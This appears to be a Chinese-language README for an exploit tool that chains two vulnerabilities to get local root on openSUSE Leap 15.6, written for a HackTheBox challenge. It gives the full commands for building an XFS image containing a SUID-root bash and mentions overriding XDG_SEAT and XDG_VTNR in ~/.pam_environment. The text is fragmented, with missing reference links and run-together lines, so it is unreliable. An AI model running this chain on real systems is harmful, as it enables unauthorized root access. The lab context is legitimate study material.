该利用工具是为解决一个针对 openSUSE Leap 15.6 的 HackTheBox 挑战而开发的。
本利用基于 Qualys 安全团队的原始研究:
附加参考实现:
此利用链通过组合两个漏洞,在 openSUSE Leap 15.6 上实现从非特权用户到 root 的本地权限提升:
利用需要预先创建一个包含 SUID bash 二进制的 XFS 文件系统镜像。该操作需在具有 root 权限的 Linux 机器上完成:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
验证镜像创建是否正确:
file xfs.image
# 应输出:"SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment,包含 XDG_SEAT 和 XDG_VTNR 覆盖值如果利用失败:
file xfs.imagesystemctl status udisks2本利用仅用于教育目的和授权的安全测试。请负责任地使用,且仅在获得测试权限的系统上使用。